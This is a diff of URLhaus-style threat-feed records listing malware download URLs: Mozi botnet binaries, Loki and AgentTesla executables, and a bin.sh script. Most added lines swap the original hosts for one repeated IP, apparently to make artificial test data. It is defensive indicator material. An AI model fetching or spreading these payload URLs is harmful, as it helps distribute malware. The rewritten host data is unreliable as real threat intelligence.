-{"id":"960936","urlhaus_reference":"https://urlhaus.abuse.ch/url/960936/","url":"http://59.99.41.229:49596/Mozi.m","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960937","urlhaus_reference":"https://urlhaus.abuse.ch/url/960937/","url":"http://42.229.232.193:39815/Mozi.m","url_status":"online","host":"42.229.232.193","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960938","urlhaus_reference":"https://urlhaus.abuse.ch/url/960938/","url":"http://61.53.104.80:36568/Mozi.m","url_status":"online","host":"61.53.104.80","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960939","urlhaus_reference":"https://urlhaus.abuse.ch/url/960939/","url":"http://222.141.45.45:32954/Mozi.m","url_status":"online","host":"222.141.45.45","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960933","urlhaus_reference":"https://urlhaus.abuse.ch/url/960933/","url":"http://211.195.3.122:57752/Mozi.m","url_status":"online","host":"211.195.3.122","date_added":"2021-01-14 15:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960932","urlhaus_reference":"https://urlhaus.abuse.ch/url/960932/","url":"http://186.33.123.115:52221/Mozi.m","url_status":"online","host":"186.33.123.115","date_added":"2021-01-14 15:51:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960931","urlhaus_reference":"https://urlhaus.abuse.ch/url/960931/","url":"http://125.44.251.66:58493/Mozi.m","url_status":"online","host":"125.44.251.66","date_added":"2021-01-14 15:50:40 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960930","urlhaus_reference":"https://urlhaus.abuse.ch/url/960930/","url":"http://117.222.174.88:57603/Mozi.m","url_status":"offline","host":"117.222.174.88","date_added":"2021-01-14 15:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960929","urlhaus_reference":"https://urlhaus.abuse.ch/url/960929/","url":"http://117.202.70.238:45439/Mozi.m","url_status":"offline","host":"117.202.70.238","date_added":"2021-01-14 15:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960928","urlhaus_reference":"https://urlhaus.abuse.ch/url/960928/","url":"http://117.222.163.220:58291/Mozi.m","url_status":"offline","host":"117.222.163.220","date_added":"2021-01-14 15:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960927","urlhaus_reference":"https://urlhaus.abuse.ch/url/960927/","url":"http://117.251.18.157:52785/Mozi.m","url_status":"online","host":"117.251.18.157","date_added":"2021-01-14 15:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
-{"id":"960924","urlhaus_reference":"https://urlhaus.abuse.ch/url/960924/","url":"http://123.9.198.150:38582/Mozi.m","url_status":"online","host":"123.9.198.150","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960925","urlhaus_reference":"https://urlhaus.abuse.ch/url/960925/","url":"http://125.46.164.249:39503/Mozi.m","url_status":"online","host":"125.46.164.249","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960926","urlhaus_reference":"https://urlhaus.abuse.ch/url/960926/","url":"http://123.14.32.234:53018/Mozi.m","url_status":"online","host":"123.14.32.234","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960923","urlhaus_reference":"https://urlhaus.abuse.ch/url/960923/","url":"http://123.5.7.214:40698/Mozi.m","url_status":"online","host":"123.5.7.214","date_added":"2021-01-14 15:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960922","urlhaus_reference":"https://urlhaus.abuse.ch/url/960922/","url":"http://116.24.57.201:50060/Mozi.m","url_status":"online","host":"116.24.57.201","date_added":"2021-01-14 15:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960921","urlhaus_reference":"https://urlhaus.abuse.ch/url/960921/","url":"http://115.48.21.16:47874/Mozi.m","url_status":"online","host":"115.48.21.16","date_added":"2021-01-14 15:49:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960941","urlhaus_reference":"https://urlhaus.abuse.ch/url/960941/","url":"http://89.160.20.156:46462/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960940","urlhaus_reference":"https://urlhaus.abuse.ch/url/960940/","url":"http://89.160.20.156:39046/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960934","urlhaus_reference":"https://urlhaus.abuse.ch/url/960934/","url":"http://89.160.20.156:47418/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960935","urlhaus_reference":"https://urlhaus.abuse.ch/url/960935/","url":"http://89.160.20.156:42287/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960936","urlhaus_reference":"https://urlhaus.abuse.ch/url/960936/","url":"http://89.160.20.156:49596/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960937","urlhaus_reference":"https://urlhaus.abuse.ch/url/960937/","url":"http://89.160.20.156:39815/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960938","urlhaus_reference":"https://urlhaus.abuse.ch/url/960938/","url":"http://89.160.20.156:36568/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960939","urlhaus_reference":"https://urlhaus.abuse.ch/url/960939/","url":"http://89.160.20.156:32954/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960933","urlhaus_reference":"https://urlhaus.abuse.ch/url/960933/","url":"http://89.160.20.156:57752/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960932","urlhaus_reference":"https://urlhaus.abuse.ch/url/960932/","url":"http://89.160.20.156:52221/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960931","urlhaus_reference":"https://urlhaus.abuse.ch/url/960931/","url":"http://89.160.20.156:58493/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:40 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960930","urlhaus_reference":"https://urlhaus.abuse.ch/url/960930/","url":"http://89.160.20.156:57603/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:50:14 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960929","urlhaus_reference":"https://urlhaus.abuse.ch/url/960929/","url":"http://89.160.20.156:45439/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:50:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960928","urlhaus_reference":"https://urlhaus.abuse.ch/url/960928/","url":"http://89.160.20.156:58291/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960927","urlhaus_reference":"https://urlhaus.abuse.ch/url/960927/","url":"http://89.160.20.156:52785/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960924","urlhaus_reference":"https://urlhaus.abuse.ch/url/960924/","url":"http://89.160.20.156:38582/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960925","urlhaus_reference":"https://urlhaus.abuse.ch/url/960925/","url":"http://89.160.20.156:39503/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960926","urlhaus_reference":"https://urlhaus.abuse.ch/url/960926/","url":"http://89.160.20.156:53018/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960923","urlhaus_reference":"https://urlhaus.abuse.ch/url/960923/","url":"http://89.160.20.156:40698/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960922","urlhaus_reference":"https://urlhaus.abuse.ch/url/960922/","url":"http://89.160.20.156:50060/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:49:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960921","urlhaus_reference":"https://urlhaus.abuse.ch/url/960921/","url":"http://89.160.20.156:47874/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
{"id":"960919","urlhaus_reference":"https://urlhaus.abuse.ch/url/960919/","url":"http://perezluzwsdycafeyzmn.dns.navy/perdoc/regasm.exe","url_status":"online","host":"perezluzwsdycafeyzmn.dns.navy","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki","opendir"]}
-{"id":"960920","urlhaus_reference":"https://urlhaus.abuse.ch/url/960920/","url":"http://59.58.148.90:33799/bin.sh","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
+{"id":"960920","urlhaus_reference":"https://urlhaus.abuse.ch/url/960920/","url":"http://89.160.20.156:33799/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:46:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
 {"id":"960918","urlhaus_reference":"https://urlhaus.abuse.ch/url/960918/","url":"http://kalamikwsdyonlinedws.dns.navy/kaladoc/vbc.exe","url_status":"online","host":"kalamikwsdyonlinedws.dns.navy","date_added":"2021-01-14 15:45:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"listed"},"reporter":"abuse_ch","larted":"true","tags":["AgentTesla","exe"]}
-{"id":"960917","urlhaus_reference":"https://urlhaus.abuse.ch/url/960917/","url":"http://54.224.10.186/js/js/lokkk.jpg","url_status":"online","host":"54.224.10.186","date_added":"2021-01-14 15:45:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki"]}
-{"id":"960916","urlhaus_reference":"https://urlhaus.abuse.ch/url/960916/","url":"http://59.99.141.110:33201/Mozi.a","url_status":"offline","host":"59.99.141.110","date_added":"2021-01-14 15:38:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960914","urlhaus_reference":"https://urlhaus.abuse.ch/url/960914/","url":"http://59.99.136.138:53926/Mozi.m","url_status":"offline","host":"59.99.136.138","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960915","urlhaus_reference":"https://urlhaus.abuse.ch/url/960915/","url":"http://61.245.159.55:43917/Mozi.m","url_status":"online","host":"61.245.159.55","date_added":"2021-01-14 15:38:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960911","urlhaus_reference":"https://urlhaus.abuse.ch/url/960911/","url":"http://59.99.43.122:42053/Mozi.m","url_status":"offline","host":"59.99.43.122","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960912","urlhaus_reference":"https://urlhaus.abuse.ch/url/960912/","url":"http://49.68.21.201:57875/Mozi.m","url_status":"online","host":"49.68.21.201","date_added":"2021-01-14 15:38:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960913","urlhaus_reference":"https://urlhaus.abuse.ch/url/960913/","url":"http://59.96.26.38:35523/Mozi.m","url_status":"offline","host":"59.96.26.38","date_added":"2021-01-14 15:38:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960910","urlhaus_reference":"https://urlhaus.abuse.ch/url/960910/","url":"http://42.224.66.103:47418/i","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:38:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"960908","urlhaus_reference":"https://urlhaus.abuse.ch/url/960908/","url":"http://27.41.206.240:53007/Mozi.m","url_status":"offline","host":"27.41.206.240","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960909","urlhaus_reference":"https://urlhaus.abuse.ch/url/960909/","url":"http://42.230.133.2:38089/Mozi.m","url_status":"offline","host":"42.230.133.2","date_added":"2021-01-14 15:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960904","urlhaus_reference":"https://urlhaus.abuse.ch/url/960904/","url":"http://42.230.178.221:35243/Mozi.m","url_status":"online","host":"42.230.178.221","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960905","urlhaus_reference":"https://urlhaus.abuse.ch/url/960905/","url":"http://42.224.249.12:50589/Mozi.m","url_status":"online","host":"42.224.249.12","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960906","urlhaus_reference":"https://urlhaus.abuse.ch/url/960906/","url":"http://221.200.70.79:42479/Mozi.m","url_status":"online","host":"221.200.70.79","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960907","urlhaus_reference":"https://urlhaus.abuse.ch/url/960907/","url":"http://42.224.168.94:43425/Mozi.m","url_status":"online","host":"42.224.168.94","date_added":"2021-01-14 15:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960903","urlhaus_reference":"https://urlhaus.abuse.ch/url/960903/","url":"http://163.125.207.35:35013/Mozi.a","url_status":"online","host":"163.125.207.35","date_added":"2021-01-14 15:36:28 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960902","urlhaus_reference":"https://urlhaus.abuse.ch/url/960902/","url":"http://125.44.244.43:35298/Mozi.m","url_status":"online","host":"125.44.244.43","date_added":"2021-01-14 15:35:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960900","urlhaus_reference":"https://urlhaus.abuse.ch/url/960900/","url":"http://116.73.8.210:54174/Mozi.m","url_status":"online","host":"116.73.8.210","date_added":"2021-01-14 15:35:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960901","urlhaus_reference":"https://urlhaus.abuse.ch/url/960901/","url":"http://121.61.104.66:42768/Mozi.a","url_status":"online","host":"121.61.104.66","date_added":"2021-01-14 15:35:09 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960898","urlhaus_reference":"https://urlhaus.abuse.ch/url/960898/","url":"http://117.247.206.115:59110/Mozi.a","url_status":"offline","host":"117.247.206.115","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960899","urlhaus_reference":"https://urlhaus.abuse.ch/url/960899/","url":"http://119.198.43.18:51476/Mozi.m","url_status":"online","host":"119.198.43.18","date_added":"2021-01-14 15:35:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960897","urlhaus_reference":"https://urlhaus.abuse.ch/url/960897/","url":"http://182.124.94.169:58839/Mozi.m","url_status":"online","host":"182.124.94.169","date_added":"2021-01-14 15:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960894","urlhaus_reference":"https://urlhaus.abuse.ch/url/960894/","url":"http://125.46.166.16:50249/Mozi.m","url_status":"online","host":"125.46.166.16","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960895","urlhaus_reference":"https://urlhaus.abuse.ch/url/960895/","url":"http://123.4.250.147:46173/Mozi.m","url_status":"online","host":"123.4.250.147","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960896","urlhaus_reference":"https://urlhaus.abuse.ch/url/960896/","url":"http://182.124.57.87:43785/Mozi.m","url_status":"online","host":"182.124.57.87","date_added":"2021-01-14 15:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960893","urlhaus_reference":"https://urlhaus.abuse.ch/url/960893/","url":"http://113.92.159.37:46924/Mozi.m","url_status":"online","host":"113.92.159.37","date_added":"2021-01-14 15:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960892","urlhaus_reference":"https://urlhaus.abuse.ch/url/960892/","url":"http://113.195.165.157:59734/Mozi.m","url_status":"online","host":"113.195.165.157","date_added":"2021-01-14 15:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960889","urlhaus_reference":"https://urlhaus.abuse.ch/url/960889/","url":"http://103.84.240.178:51620/Mozi.m","url_status":"offline","host":"103.84.240.178","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960890","urlhaus_reference":"https://urlhaus.abuse.ch/url/960890/","url":"http://115.54.239.78:42585/Mozi.a","url_status":"online","host":"115.54.239.78","date_added":"2021-01-14 15:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960891","urlhaus_reference":"https://urlhaus.abuse.ch/url/960891/","url":"http://103.46.242.87:57941/Mozi.m","url_status":"offline","host":"103.46.242.87","date_added":"2021-01-14 15:34:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960888","urlhaus_reference":"https://urlhaus.abuse.ch/url/960888/","url":"http://115.52.17.165:38308/i","url_status":"online","host":"115.52.17.165","date_added":"2021-01-14 15:32:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"960887","urlhaus_reference":"https://urlhaus.abuse.ch/url/960887/","url":"http://42.227.222.174:55281/Mozi.m","url_status":"online","host":"42.227.222.174","date_added":"2021-01-14 15:22:44 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960886","urlhaus_reference":"https://urlhaus.abuse.ch/url/960886/","url":"http://42.233.232.90:57662/Mozi.a","url_status":"online","host":"42.233.232.90","date_added":"2021-01-14 15:22:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960885","urlhaus_reference":"https://urlhaus.abuse.ch/url/960885/","url":"http://59.97.173.255:40738/Mozi.m","url_status":"offline","host":"59.97.173.255","date_added":"2021-01-14 15:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960884","urlhaus_reference":"https://urlhaus.abuse.ch/url/960884/","url":"http://59.99.93.5:59018/Mozi.m","url_status":"offline","host":"59.99.93.5","date_added":"2021-01-14 15:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960880","urlhaus_reference":"https://urlhaus.abuse.ch/url/960880/","url":"http://39.66.175.56:60279/Mozi.a","url_status":"online","host":"39.66.175.56","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960881","urlhaus_reference":"https://urlhaus.abuse.ch/url/960881/","url":"http://27.216.188.167:52738/Mozi.m","url_status":"online","host":"27.216.188.167","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960882","urlhaus_reference":"https://urlhaus.abuse.ch/url/960882/","url":"http://60.212.123.142:37394/Mozi.m","url_status":"online","host":"60.212.123.142","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960883","urlhaus_reference":"https://urlhaus.abuse.ch/url/960883/","url":"http://58.249.22.13:56491/Mozi.m","url_status":"online","host":"58.249.22.13","date_added":"2021-01-14 15:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960879","urlhaus_reference":"https://urlhaus.abuse.ch/url/960879/","url":"http://120.193.91.214:46067/Mozi.a","url_status":"online","host":"120.193.91.214","date_added":"2021-01-14 15:20:19 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"960917","urlhaus_reference":"https://urlhaus.abuse.ch/url/960917/","url":"http://89.160.20.156/js/js/lokkk.jpg","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 15:45:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["exe","Loki"]}
